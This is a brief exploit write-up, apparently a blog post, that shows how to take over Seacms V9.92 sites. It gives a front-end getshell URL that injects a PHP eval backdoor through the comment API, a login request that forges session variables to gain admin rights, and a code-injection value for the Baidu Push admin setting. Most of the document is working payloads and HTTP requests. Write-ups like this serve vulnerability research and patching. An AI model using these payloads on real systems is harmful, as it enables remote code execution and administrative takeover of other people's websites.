Seacms V9.92 front-end getshell + privilege escalation



Reproduction environment

  • php5.6
  • Seacms V9.92

Front-end getshell

/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_]);?%3E


/data/mysqli_error_trace.php?_=phpinfo();


Privilege escalation

  • Register an ordinary user
  • Capture the request while logging in
POST /seacms/login.php HTTP/1.1
Host: 192.168.2.1
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.1/seacms/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=0pq113te1odvj4d7kulrpkphn1
Connection: close
    
dopost=login&userid=test&pwd=test&validate=ltvt&_SESSION[sea_admin_id]=1&_SESSION[sea_ckstr]=ltvt


  • The admin panel path needs to be known (Emmm...)


  • Go to System - Baidu Push and submit the following as the value:
";phpinfo();//


This work is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License.
